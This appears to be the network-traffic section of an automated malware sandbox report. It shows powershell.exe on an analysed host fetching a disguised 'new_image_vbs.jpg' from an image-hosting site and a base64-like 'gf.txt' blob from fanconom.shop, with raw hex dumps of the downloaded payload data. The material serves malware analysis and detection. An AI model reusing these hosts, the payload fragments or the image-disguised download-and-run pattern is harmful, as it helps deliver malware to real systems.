2024-04-17 06:39:24 UTC	1369	IN	Data Raw: cd 34 1e 1a 3c a4 52 cc a5 76 d0 0c 4f 4b 61 78 1e 78 15 7e ab 7f 0c 63 4e 88 d2 84 31 17 b1 e9 50 c5 6b ea 30 22 c0 e2 f7 77 1d 86 71 90 af 73 7f 0c 0d 43 a1 a5 e3 4c a6 bb 89 5b 8f 9f a7 2a fa 22 bb 6f 4c b4 4d 7a 64 6a fa f1 8a c1 ac 9c cf 12 99 a6 71 b8 0d aa c6 cf 3d 33 d1 ce ea fa 56 31 a2 db 10 9c 80 6f ad 8a 3d aa ef 9c 0c 73 a0 43 75 a6 5a 06 8d cc c3 fa 67 2e 89 28 56 91 48 3d 0f 9a 48 fc eb 3d 01 82 3f 3b 72 a4 61 aa ba 00 55 7d 85 0e 9f 5c 21 86 c0 b0 a4 7b 0c 0f 3c 34 4a c7 8d 3a 90 3f fb 69 e3 ff 00 0e 17 4f e0 b3 4f 32 bc 5a 55 5e 6c 39 9d 97 69 1d 0f e1 eb 79 b8 23 8d 48 a2 01 ec 08 b1 92 0c 85 c9 f3 4d 8f 73 55 80 ac fe 0b 0e b3 c4 97 59 1c ac b2 ab 2b 48 cc cb 6a 55 46 d2 ab 55 46 8d df 4f 8f 4c c7 d4 e8 9b 4f 3e a4 69 b4 10 88 a1 6d c1 Data Ascii: 4<RvOKaxx~cN1Pk0"wqsCL[*"oLMzdjq=3V1o=sCuZg.(VH=H=?;raU}\!{<4J:?iOO2ZU^l9iy#HMsUY+HjUFUFOLO>im
2024-04-17 06:39:24 UTC	1369	IN	Data Raw: 72 3a 06 01 54 90 2e fa 66 7b a3 f9 62 40 a4 5d 7e 2e fc 60 2f 1a a2 3f 24 93 54 4f 61 8e 2d 4a 9b 56 e9 7a d6 26 59 88 36 aa 2b db 0b 1f 99 15 6d e7 70 bc 03 c9 28 8d 76 ef 00 f4 e7 28 60 0a 81 81 52 b4 4f 18 35 2c 75 54 e8 38 e8 48 be d8 e8 53 3c 2c a3 69 da 3a 03 47 f2 c0 41 b6 ae 98 28 71 ea e0 93 db 20 c6 87 4c 44 64 b1 2d 74 3e 58 ab 02 ac 45 11 cf 7c 6b 46 76 ab 10 81 be 78 14 92 09 56 15 77 71 b7 b0 38 c4 53 9d 52 ac 12 c4 0a a8 fc 43 a8 c0 49 1c f3 7a c2 96 5f 61 db 02 92 3c 36 14 95 f7 b1 80 6d 62 69 90 a8 81 f7 7f 88 9c 8d 14 eb a7 9c 3b 0b 5e f8 23 0b ed 57 23 86 e9 83 e4 58 c0 f4 4f af 86 d9 1b a1 1b 94 fb 9c 04 3e 27 3c 5a 95 96 34 2c 3f 0f 1e f9 89 cd 8b c7 a1 98 a4 41 4a 85 fe 21 7d f0 0f ad f1 4d 6b 6b 19 98 b2 1b e1 7d b1 87 d3 cd a9 d3 Data Ascii: r:T.f{b@]~.`/?$TOa-JVz&Y6+mp(v(`RO5,uT8HS<,i:GA(q LDd-t>XE\|kFvxVwq8SRCIz_a<6mbi;^#W#XO>'<Z4,?AJ!}Mkk}
2024-04-17 06:39:24 UTC	1369	IN	Data Raw: dd 47 db 1d 13 85 1f 76 75 23 8f 4d 56 78 a0 db 5c 89 23 5d bd be 18 60 c1 e2 dc 63 5a 51 55 ef 81 e8 13 ed 54 52 b8 67 d3 35 06 21 42 f7 c7 f5 3f 6b f4 b0 e9 83 36 96 50 38 1c 1a 39 e4 21 7b e1 23 51 ec 79 eb 87 62 25 fd dc 88 ac 3b f2 70 37 0f da d8 1e 20 cb a5 9a 8f bb 62 69 f6 af 4b bd 80 d2 4a 0d f3 6d 99 4e a1 18 aa 00 54 76 ba c5 66 01 19 58 46 a0 9e 4d 1b c0 f4 9f fc 4d a0 59 96 63 a2 70 ed c7 5e 71 6d 5f da 5d 16 bb 4c d0 49 a3 93 67 00 8b eb 9e 73 57 aa 68 d3 7e d0 c7 b7 c3 07 0e a5 a7 87 70 00 71 c8 1e f8 1a de 1f e2 fa 0f 09 59 57 4d a1 98 96 3c 96 ec 31 98 be d6 69 8b 94 3a 47 51 d4 1b eb 98 7a 67 79 94 a1 b0 41 ac 60 e9 d5 c8 26 35 b5 e3 9e 30 35 9b ed 4c 09 3b 37 91 20 42 bd 3e 39 57 fb 53 a7 53 ea d3 48 54 fc 73 38 e9 8b 72 d1 aa a8 e3 ae Data Ascii: Gvu#MVx\#]`cZQUTRg5!B?k6P89!{#Qyb%;p7 biKJmNTvfXFMMYcp^qm_]LIgsWh~pqYWM<1i:GQzgyA`&505L;7 B>9WSSHTs8r
2024-04-17 06:39:24 UTC	1369	IN	Data Raw: 6c 57 5f 34 2f a5 6d 8c cd d3 9f 6e 71 af 23 4f 2a 2a 19 ce e6 21 78 42 07 e7 8a 6a fc 36 18 23 94 09 98 95 e9 cf 5c 04 9d 56 48 91 90 b1 a5 a2 3f ae 5c b2 4a ea cb 1a 92 00 5a 51 db df 2f a3 d8 a4 ab 10 23 22 c9 ee 49 ed 97 45 58 dd bc b1 e9 e8 d6 3a 57 38 03 48 9b ce e1 c8 37 c5 71 58 cc 40 34 92 16 56 25 56 c1 39 29 13 cc cc c3 8d a6 f2 f2 b1 d8 52 36 05 82 d3 57 d3 00 0f 36 e7 24 a9 6d c4 d0 1c e0 52 17 2e c4 13 63 db 8e 31 85 d3 ee 89 5c 1d ac b6 4f be 2b 36 a9 a1 b5 04 97 ef 7d b0 08 b0 97 3d 79 5e a7 13 9d 97 7e e1 5b b2 3c d9 ca ef 2d 4a c6 b2 d3 45 12 51 56 bb 17 f5 c0 e8 b5 0c 7d 3b aa ba 1f 7c 31 d4 c8 06 ed a4 af 7a c4 95 77 72 38 af 86 30 db cb 14 2f 60 76 18 04 49 3c c5 52 b4 08 fc 40 fc f1 89 1b 69 da 2a ab af c7 12 89 1d 24 21 40 03 83 ce Data Ascii: lW_4/mnq#O*!xBj6#\VH?\JZQ/#"IEX:W8H7qX@4V%V9)R6W6$mR.c1\O+6}=y^~[<-JEQV};\|1zwr80/`vI<R@i$!@
2024-04-17 06:39:24 UTC	1369	IN	Data Raw: f9 ce 8b 40 74 f1 23 89 4b 32 c8 64 7d de db 48 a3 f1 04 93 7e d8 8e af c5 f5 07 57 12 0d 39 d3 a6 e0 c4 b2 db 15 27 36 1e 09 5e 16 48 e4 65 0c 49 0d 60 70 47 b0 1d 7e a3 01 49 74 6b a9 8d 4e e2 50 a2 b6 d5 e4 1e 49 35 5c 59 f7 c6 84 70 a0 0c 23 0a 15 78 25 79 03 db 32 f4 11 eb 24 f1 a6 3a a9 e9 51 2f 62 31 0a 18 dd 0a ee 48 e4 e6 bc 8a ea db 55 0c 9c 85 36 68 55 e0 7c f3 ed 4a be 9b c4 d0 47 34 a5 5d 43 72 6a ba f1 9c 9a 8d 34 fa 38 fc e5 32 35 ed 0a 41 e0 9b 3d 47 3d b1 df b4 70 a6 a3 c7 e1 47 00 2f 93 7c 76 00 1e f9 e7 0a 9d 3e a4 84 2a c5 4d ab 29 b1 f0 fd 70 1c d6 68 d7 4a c1 96 65 65 6e 42 f3 78 a1 7d c7 36 f4 fe 1b 36 ae 17 d4 4f ea 91 d7 d0 a5 bf 13 76 24 df 18 b6 ab 45 14 5a 58 5c 3a ac db 03 32 96 14 dd 41 20 fc 0e 06 68 bb eb 43 0d 04 07 53 a8 Data Ascii: @t#K2d}H~W9'6^HeI`pG~ItkNPI5\Yp#x%y2$:Q/b1HU6hU\|JG4]Crj4825A=G=pG/\|v>*M)phJeenBx}66Ov$EZX\:2A hCS

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49701	172.67.215.45	443	5804	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-17 06:39:26 UTC	100	OUT	GET /images/004/766/978/full/new_image_vbs.jpg?1712588469 HTTP/1.1 Host: uploaddeimagens.com.br
2024-04-17 06:39:26 UTC	835	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 06:39:26 GMT Content-Type: image/jpeg Content-Length: 118736 Connection: close Cache-Control: public, max-age=31536000 Content-Disposition: inline; filename="new_image_vbs.jpg" Expires: Mon, 08 Apr 2024 16:01:15 GMT X-Request-Id: PxIOE8gu4y-ZFeuKfZrsa X-Cache-Status: HIT CF-Cache-Status: HIT Age: 746356 Last-Modified: Mon, 08 Apr 2024 15:20:10 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KWaWhucBdcVOA6LZAmgLisXssMOJ39PQCfUogzapC9aapevcw26hwO1gS8ySKDPaR%2FNatU7kKYA9m5UPZ4iGNQBLKwtllDB8PxRS1U34tMtMxIo6zOfbgvIcdu%2F26MYPHH6KkYY4IE9t"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 875a6aff592d8bbc-ATL alt-svc: h3=":443"; ma=86400
2024-04-17 06:39:26 UTC	534	IN	Data Raw: ff d8 ff e1 00 bc 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 06 00 12 01 03 00 01 00 00 00 01 00 00 00 1a 01 05 00 01 00 00 00 56 00 00 00 1b 01 05 00 01 00 00 00 5e 00 00 00 28 01 03 00 01 00 00 00 02 00 00 00 13 02 03 00 01 00 00 00 01 00 00 00 69 87 04 00 01 00 00 00 66 00 00 00 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 00 00 00 06 00 00 90 07 00 04 00 00 00 30 32 31 30 01 91 07 00 04 00 00 00 01 02 03 00 00 a0 07 00 04 00 00 00 30 31 30 30 01 a0 03 00 01 00 00 00 ff ff 00 00 02 a0 04 00 01 00 00 00 d4 03 00 00 03 a0 04 00 01 00 00 00 27 02 00 00 00 00 00 00 ff db 00 43 00 06 04 05 06 05 04 06 06 05 06 07 07 06 08 0a 10 0a 0a 09 09 0a 14 0e 0f 0c 10 17 14 18 18 17 14 16 16 1a 1d 25 1f 1a 1b 23 1c 16 16 20 2c 20 23 26 27 29 2a 29 19 1f 2d 30 2d Data Ascii: ExifIIV^(ifHH02100100'C%# , #&'))-0-
2024-04-17 06:39:26 UTC	1369	IN	Data Raw: a5 71 ba ec 76 a7 d7 97 24 c6 c9 39 04 b7 0d e9 e9 4a 24 83 56 08 19 3f 2a 08 22 94 97 03 76 27 de 8e 9a 5c 32 a6 07 94 0a 85 2d 55 8e 24 19 07 60 ab c7 d7 d6 a6 91 40 73 92 7e 94 1c 89 dc 92 34 8c 7a e7 8a 92 29 1c ee 71 a4 d4 76 d6 cd 3c e9 1c 79 2c c4 28 1f 3a b2 43 f0 c5 eb 85 12 18 a3 1c e4 b1 3f 4d a8 13 6b 01 72 70 08 db 6a e2 37 74 e2 46 2a 4e 42 ff 00 97 db de 9e cf f0 8d c4 4a cd 6f 70 1f b9 52 08 c9 f9 d6 0f 86 2e 32 7f 6d 0a 8c 73 83 b1 a0 42 b2 1d 67 63 a7 3f 95 01 d5 2e ee 0e 98 ed db 48 c6 75 0e 4d 5b e5 f8 62 67 8d 51 66 4d f6 72 41 18 fe a2 95 8f 87 3a 97 8f e0 b4 0b a1 06 ce 48 29 8e 36 fe 94 0a 6c ee a6 93 22 52 0c a0 6e 40 c0 23 fa d7 6e c5 8e 5a a4 b2 e9 52 fd ee ed 75 29 36 de 5d 2a 72 ce 73 81 b7 f7 c5 1d 07 47 b8 9e 3f 13 54 51 a9 Data Ascii: qv$9J$V?"v'\2-U$`@s~4z)qv<y,(:C?Mkrpj7tFNBJopR.2msBgc?.HuM[bgQfMrA:H)6l"Rn@#nZRu)6]*rsG?TQ
2024-04-17 06:39:26 UTC	1369	IN	Data Raw: 6f 22 99 9b 50 1e 57 dd 7d 08 07 f5 af 12 33 40 2d e7 11 c9 2e a6 04 01 83 93 b7 7a bb 7d 9c 7c 55 73 d1 ba 0f 53 8f a6 4a 22 b8 9f c3 f1 1a 48 c3 82 c0 36 39 f9 d0 7a d7 c5 16 dd 5e f6 ee de c2 d4 c7 1f 4b 95 f1 7a e0 90 ed 1f 3a 47 b1 e0 fc e9 17 52 9d 2d ac 7e 37 82 02 d6 f0 c7 77 66 17 c3 c6 14 2c 11 8c 01 ed 8a af d8 7c 7b d7 5a de 36 ea 32 44 66 24 86 61 10 3a bd 08 c7 15 5a ea ff 00 14 df 5c 47 f1 16 19 63 fb ec b6 ed 20 f0 fb aa 28 18 f4 e2 82 e1 7b f0 b5 8f 5b f8 df a6 c7 20 f0 ad e2 e9 51 5d 34 48 3c b2 9d 78 c3 7e 75 e9 a9 79 3d bd 8b ad ac 7e 32 c4 b8 48 c3 60 10 3b 0a f0 cb 7f 8a fa 8c 1f 12 59 5d 44 d1 eb 3d 31 61 c8 8f 60 a0 8c 6d f4 c5 3e b5 f8 e3 ad 2c 0c 63 8a 12 c5 f9 11 81 b5 07 b1 c3 7f 2b 69 02 4c 9c 6f 9d f1 51 df 5f dc 09 2d 88 43 Data Ascii: o"PW}3@-.z}\|UsSJ"H69z^Kz:GR-~7wf,\|{Z62Df$a:Z\Gc ({[ Q]4H<x~uy=~2H`;Y]D=1a`m>,c+iLoQ_-C
2024-04-17 06:39:26 UTC	1369	IN	Data Raw: ed 4e 6c 7a d5 cc 11 3e 7c 29 1d 87 90 94 07 4f e9 41 6a 85 2d a2 80 f8 b3 eb 24 86 db 23 7d fc bf c2 85 bd 16 e6 36 96 39 c6 72 3f 66 3b fa fd 07 d6 95 ff 00 8e dc ac 83 75 11 32 91 a7 c1 52 55 b8 cf 1f 5a 05 ba b5 da 4a 57 c4 8c 6e 09 3e 0a 93 8f ca 80 bb b7 92 35 13 c5 a5 88 3b 8c f2 28 7b 79 66 8d 84 4b 2b 2b ee 52 39 5b ca e0 8e cd 50 b7 53 9a 51 29 f2 19 1d c8 de 30 34 8f a7 f7 f3 a0 24 9a e0 43 e1 36 97 42 75 04 2b c1 f6 a0 d3 34 a2 f7 c4 91 4c 72 23 00 55 36 60 71 c8 15 64 b7 ff 00 9a 82 16 90 b2 b0 3a b4 e7 7c fb ff 00 4a ab c9 2c c1 53 5e 48 5f c3 a8 6e 07 ce b6 f7 d7 0c 81 4b 93 83 e9 fa fc e8 1e f5 1b 22 d3 24 96 d8 8e 4e 75 46 30 73 df 3e d4 9e 58 a5 6b 87 73 1f 82 f9 21 82 8f 2f bf ca a4 b3 ea 17 73 4e 91 6b 53 e9 91 8e 29 c5 d0 b9 30 39 8e Data Ascii: Nlz>\|)OAj-$#}69r?f;u2RUZJWn>5;({yfK++R9[PSQ)04$C6Bu+4Lr#U6`qd:\|J,S^H_nK"$NuF0s>Xks!/sNkS)09
2024-04-17 06:39:26 UTC	1369	IN	Data Raw: 96 ed 73 22 c8 8c a4 65 70 3c bf 4c 7f 1a 06 96 97 4b 3d d4 90 88 ee 21 96 30 09 f1 13 03 7e 30 73 bd 0b f1 1d 93 5c da c9 37 88 ea 60 46 3e 53 f8 c1 c6 41 f6 da b3 a2 41 79 6f 72 e9 71 74 2f 2c ca 12 92 e4 79 48 3c 66 99 f5 28 4c 9d 2a e4 2b 2e 0a 1c ee 3f 8d 07 9e 3d ab bb 12 ce 00 03 ca 0e 4e 07 a6 6b 42 06 7b 63 1e 98 a3 18 21 99 77 2e 09 c8 ce 78 c6 29 c3 59 ce 8a cc 63 6d 03 db 39 f9 62 84 9a 12 63 26 35 00 9f 2e 47 6c fb 50 0d 67 2c 50 db f8 73 d9 da 39 53 92 1a 32 4f e7 9d e8 1b 94 8c cd 27 84 3c 2d ff 00 e9 c6 0b 28 fa fa 53 88 16 dc e8 f1 86 a6 18 07 03 1b f7 15 39 b5 8e 38 72 ea e1 d9 c1 04 1f dd f4 f9 d0 55 09 d1 e5 2d 8c 9e 6b 99 a5 90 20 4c 91 fc ea d3 79 67 6d 24 00 24 0e c4 12 41 1e 99 ff 00 7a 55 73 d3 a5 9a e3 fe 46 06 54 51 fb e3 19 db Data Ascii: s"ep<LK=!0~0s\7`F>SAAyorqt/,yH<f(L*+.?=NkB{c!w.x)Ycm9bc&5.GlPg,Ps9S2O'<-(S98rU-k Lygm$$AzUsFTQ
2024-04-17 06:39:26 UTC	1369	IN	Data Raw: ce e4 0e 32 19 79 07 d6 8b bd 64 86 22 91 ae a6 52 02 14 39 20 1e 73 b5 04 d2 96 5b 69 20 02 44 c9 d5 be c4 7a d0 37 b5 b4 59 23 79 4e 58 ae c0 67 83 eb 42 cb a4 68 31 af e3 6f 37 b5 6a 6e b0 dd 3f a5 48 f2 af 9c 7e 14 51 96 c7 bf a5 21 5f 8a 2d 56 42 de 0c 84 1e 54 7f 1a 07 9d 52 35 3e 7d 00 33 0e 01 c6 00 e6 84 b8 b6 28 53 51 ca 91 c9 3b 7d 6a 38 3a a4 5d 43 c5 9a 29 4f 8b 90 3c 37 d8 fb ed 47 39 f1 e3 21 0e a4 43 b9 23 18 c5 02 88 94 7d fd b2 9a bb f3 80 68 b3 6d 10 bb 52 02 bc 4c 71 b6 dc e4 9d 8d 64 b7 36 89 d4 56 3d 1e 2e a5 1e 64 db 4f f7 9a 9f c0 92 41 a6 28 34 30 05 81 27 27 e7 9a 00 26 81 60 b9 f0 d3 22 37 3b 2f 61 52 3b 14 66 c0 d9 54 65 89 f5 a3 a5 88 cf 12 cb 30 50 ea b9 27 3c 9f 51 40 dd 59 45 78 af ac 9c 46 01 24 1c 77 a0 1c 5d 22 eb f1 df Data Ascii: 2yd"R9 s[i Dz7Y#yNXgBh1o7jn?H~Q!_-VBTR5>}3(SQ;}j8:]C)O<7G9!C#}hmRLqd6V=.dOA(40''&`"7;/aR;fTe0P'<Q@YExF$w]"
2024-04-17 06:39:26 UTC	1369	IN	Data Raw: fe 15 5a 50 3f d2 9c d9 5a c4 f1 2f 84 5a 46 3f 88 2b 63 03 eb 40 d2 68 5d 84 4e 8f a9 70 58 32 ec 31 fc e8 7e 91 31 8b a9 99 a4 1e 66 04 00 bb 83 db 14 4d 8c 40 5a ac 52 ac b1 c9 16 57 d7 6d 8d 41 6d 6d 24 9a 02 02 a3 25 94 0e ff 00 33 41 25 eb 96 d6 c0 8f 3f 38 d8 e4 1e f4 bd dd c9 54 83 0a e4 e4 e4 e0 7c ea 76 51 14 85 a6 65 0c df 88 1a 96 d6 de 32 8c e5 86 90 db 6f 9c fe 94 13 a4 02 48 41 2c b8 55 c1 2a 0d 27 ca 6b 75 60 b9 04 90 0e c3 da ac 09 6c 44 6b 1a 6c 5b 2a 47 24 0f 5a ae cf 6d e1 de 22 e1 4e 39 d5 9c 7d 68 39 6b 34 9d 8b ae 51 7b 02 41 ac a3 ed ca ac 2b a5 57 07 7d f6 c7 d2 b2 83 d2 ae 11 55 46 0f 6e 45 2d 93 f1 02 0e 08 a6 97 d1 80 14 6b c1 f6 a1 18 01 c6 e0 0f ad 00 b2 26 a1 83 ab 18 e4 d7 76 c7 c3 1a 5b 25 49 e7 d2 bb 20 e4 8e 7d 2b 5a 75 Data Ascii: ZP?Z/ZF?+c@h]NpX21~1fM@ZRWmAmm$%3A%?8T\|vQe2oHA,U'ku`lDkl[G$Zm"N9}h9k4Q{A+W}UFnE-k&v[%I }+Zu
2024-04-17 06:39:26 UTC	1369	IN	Data Raw: ec 96 89 a7 cc 5c fe 10 30 00 0b be 6b 99 7f 69 72 1b 5a b0 19 19 0d b8 dc 71 53 f4 18 98 74 e0 c5 02 8c 67 1c d2 fb 99 a2 82 fb 0b 0a 98 cb 69 66 ce 73 9c 7f 5a 02 6e 71 31 60 a7 28 71 91 8e f4 a6 d1 26 17 71 88 5f 12 2e 7f 18 d8 8c 71 fa 53 cb 85 55 8d 64 2a 23 d8 12 73 c5 25 b7 91 fc 71 2d 9c 46 47 dc 69 e0 77 c7 e9 fc 28 25 ea 36 b1 fd dc ca f1 b4 37 20 e5 55 58 b6 4d 0b 6d d4 6e 60 b8 76 62 85 8b 79 b6 dc 91 4f ad 2d cc 6a 24 79 4c 92 be ec 48 e3 d8 7a 0a 0b e2 14 4f ba 78 8a 8a 19 9c 64 8d 8f 06 80 63 d5 0c 8a 0b a4 47 d3 e9 59 79 d4 e1 11 88 e2 4d 2c 37 d6 b9 15 1d 91 11 d8 5c 39 4c a1 2a a4 91 de ba b2 87 ef 57 07 28 1c 46 33 a5 93 48 df b7 e9 41 cd bd ce b6 47 92 77 48 4e ad 81 c6 f5 bd 71 4b 6c c0 c8 64 96 34 6f c4 7b 76 23 f9 d3 03 62 6e 70 4c Data Ascii: \0kirZqStgifsZnq1`(q&q_.qSUd#s%q-FGiw(%67 UXMmn`vbyO-j$yLHzOxdcGYyM,7\9LW(F3HAGwHNqKld4o{v#bnpL
2024-04-17 06:39:26 UTC	1369	IN	Data Raw: 8f b8 a0 2a ef e2 09 3a 8f c3 37 23 ee 46 37 82 e2 29 34 a9 25 42 9d 4a 5b 73 9e ea 0f 3d b8 e2 91 dc de 33 22 2c 41 51 ca 69 24 b7 f7 ef f9 d1 f6 70 42 9d 27 ab 4d 69 72 f2 46 62 85 5a 37 4d 24 1f 14 60 8d ce 76 a1 ec fa b5 d5 9c 1e 15 bb 47 85 39 c3 c0 8f cf fe 40 9c 50 0f 77 78 49 0e f6 b1 e6 43 82 57 3e 52 70 0f b7 03 1f 53 4b ae 25 91 22 79 22 01 57 27 4e ad fd b6 fa 0f d6 ac ff 00 10 ad bd b4 08 b1 45 a2 2b b8 21 bb 10 85 04 ab 6e 0a e7 9d 20 82 40 ce c0 d2 d9 6c e1 82 cc 1e ad 1b db 48 74 8f 03 00 ca 57 3f 88 2f ee ff 00 f5 62 83 ab 44 92 7b 75 95 da 17 43 13 15 71 26 5b 59 c0 c6 06 e3 00 9a e2 79 44 89 04 a8 55 19 8b ae 55 76 04 8d 8f e5 b7 af 7a 75 d1 ff 00 c1 ac ba 4d dc f1 da 97 b7 99 0c 2a d2 4d aa 42 cc 99 03 03 00 10 49 c8 f6 f7 de 7b ff 00 Data Ascii: :7#F7)4%BJ[s=3",AQi$pB'MirFbZ7M$`vG9@PwxICW>RpSK%"y"W'NE+!n @lHtW?/bD{uCq&[YyDUUvzuMMBI{
2024-04-17 06:39:26 UTC	1369	IN	Data Raw: 6f 6d 6e 90 44 9b 85 4b 6d 3f 99 c6 e7 de ad 10 75 24 95 c9 8e fa 16 02 52 14 89 82 85 f3 e7 70 4f 1a 7e 75 a8 5e e1 d3 51 b9 32 20 c0 1f b6 0d fb e0 9e fc e3 23 e4 28 3c fb e2 08 25 bb 86 e2 59 e1 65 94 9d 6c 7c 32 35 62 95 c5 75 23 dc db 2c a9 11 64 64 19 54 c7 06 bd 37 e2 a4 3f e0 ee c3 56 72 83 7f 9d 79 84 2e 8b 7e 04 a5 73 e3 ef 81 e6 3c 63 1f 5a 0d 7f 8c df 41 29 92 db ee e8 58 ea 27 c2 1f 97 cb da ba 6f 89 fa a8 4d 29 34 00 1d 88 f0 45 40 66 b4 8c 3e 10 39 19 51 91 9c fb ef b6 fb fe 54 bf c1 32 b9 f0 c6 39 38 ec 07 cf d0 50 58 ac 7e 21 ea 47 a5 bb 03 10 90 dd 2c 40 f8 60 80 19 49 c0 1f 4a 93 a9 75 9b ff 00 be 4e ac f6 e9 6e 1d e3 5d 71 82 4a 8d 8e 07 27 22 97 74 a9 62 86 34 8c 48 85 e2 bb 82 52 ec 30 31 9d 27 1e b8 c8 df 1f c2 95 dc 19 45 e4 e6 66 Data Ascii: omnDKm?u$RpO~u^Q2 #(<%Yel\|25bu#,ddT7?Vry.~s<cZA)X'oM)4E@f>9QT298PX~!G,@`IJuNn]qJ'"tb4HR01'Ef

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49702	185.61.152.60	443	5804	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-17 06:39:29 UTC	75	OUT	GET /grace/gf.txt HTTP/1.1 Host: fanconom.shop Connection: Keep-Alive
2024-04-17 06:39:29 UTC	489	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 content-type: text/plain last-modified: Tue, 16 Apr 2024 21:03:57 GMT accept-ranges: bytes content-length: 360448 date: Wed, 17 Apr 2024 06:39:29 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block x-content-type-options: nosniff strict-transport-security: max-age=31536000; includeSubDomains; preload; referrer-policy: no-referrer-when-downgrade connection: close
2024-04-17 06:39:30 UTC	16384	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-04-17 06:39:30 UTC	16384	IN	Data Raw: 43 61 57 6c 66 74 38 33 67 45 77 48 43 52 49 78 4d 51 51 67 37 36 4c 2f 5a 4d 6a 4b 45 74 59 46 44 74 72 59 6a 48 36 44 4a 4a 72 39 61 70 4e 42 46 46 4e 49 6f 6d 59 56 43 65 38 79 6c 42 5a 78 64 4f 53 53 39 59 75 63 6b 32 64 64 5a 35 55 62 57 44 30 73 41 57 5a 35 4d 69 30 44 41 68 51 34 57 4a 49 42 61 73 31 62 69 62 63 4f 48 70 77 76 41 44 6d 43 52 42 4a 4e 30 62 57 6a 39 58 55 31 4d 6c 36 52 57 34 56 54 64 5a 6a 36 49 52 57 2b 4b 6e 70 37 41 55 36 4b 47 52 61 30 61 64 6f 34 50 75 2b 59 72 58 6f 58 64 70 70 71 57 50 6d 53 36 42 6c 48 6c 52 76 44 55 64 6f 48 43 4a 77 47 6d 67 59 43 43 37 77 77 48 77 4c 58 39 57 63 33 44 61 43 37 45 47 76 71 65 63 6a 59 32 4f 69 61 66 70 6f 4b 68 6b 58 46 34 5a 48 69 69 33 4e 69 38 57 53 71 66 45 30 73 74 65 52 30 59 4f 4f Data Ascii: CaWlft83gEwHCRIxMQQg76L/ZMjKEtYFDtrYjH6DJJr9apNBFFNIomYVCe8ylBZxdOSS9Yuck2ddZ5UbWD0sAWZ5Mi0DAhQ4WJIBas1bibcOHpwvADmCRBJN0bWj9XU1Ml6RW4VTdZj6IRW+Knp7AU6KGRa0ado4Pu+YrXoXdppqWPmS6BlHlRvDUdoHCJwGmgYCC7wwHwLX9Wc3DaC7EGvqecjY2OiafpoKhkXF4ZHii3Ni8WSqfE0steR0YOO
2024-04-17 06:39:30 UTC	16384	IN	Data Raw: 48 48 6c 6d 6e 61 31 51 63 36 58 35 35 55 6c 70 4c 6c 78 42 7a 74 6f 35 65 36 69 50 43 45 73 6b 30 48 6f 74 31 65 63 6c 54 45 56 32 37 4b 77 69 6a 35 7a 41 63 48 72 6d 52 35 66 45 32 70 6e 76 46 75 77 46 33 72 30 44 31 77 43 35 53 52 36 7a 74 31 57 67 6c 6d 66 33 51 37 6e 63 4d 4e 4e 78 44 67 37 71 68 63 41 56 4a 72 4c 6b 62 45 61 6f 33 5a 52 50 46 49 66 51 6d 55 42 76 54 5a 4b 6f 61 6a 54 7a 33 41 69 53 67 42 69 51 46 36 31 45 39 4a 43 58 77 56 61 52 49 6e 39 75 38 48 6c 57 4e 35 64 4d 69 53 62 78 2f 39 35 70 54 70 78 35 7a 6e 6a 6a 6a 42 59 51 53 4f 64 48 34 54 6b 4e 67 49 75 6b 55 79 73 79 63 70 47 70 32 30 34 52 74 5a 70 30 49 4b 6a 30 51 4d 38 53 78 6f 74 4d 57 4a 36 44 32 57 31 38 62 7a 61 36 4d 6d 6a 4a 64 2b 34 55 47 62 4c 6a 75 69 2b 70 4b 63 31 Data Ascii: HHlmna1Qc6X55UlpLlxBzto5e6iPCEsk0Hot1eclTEV27Kwij5zAcHrmR5fE2pnvFuwF3r0D1wC5SR6zt1Wglmf3Q7ncMNNxDg7qhcAVJrLkbEao3ZRPFIfQmUBvTZKoajTz3AiSgBiQF61E9JCXwVaRIn9u8HlWN5dMiSbx/95pTpx5znjjjBYQSOdH4TkNgIukUysycpGp204RtZp0IKj0QM8SxotMWJ6D2W18bza6MmjJd+4UGbLjui+pKc1
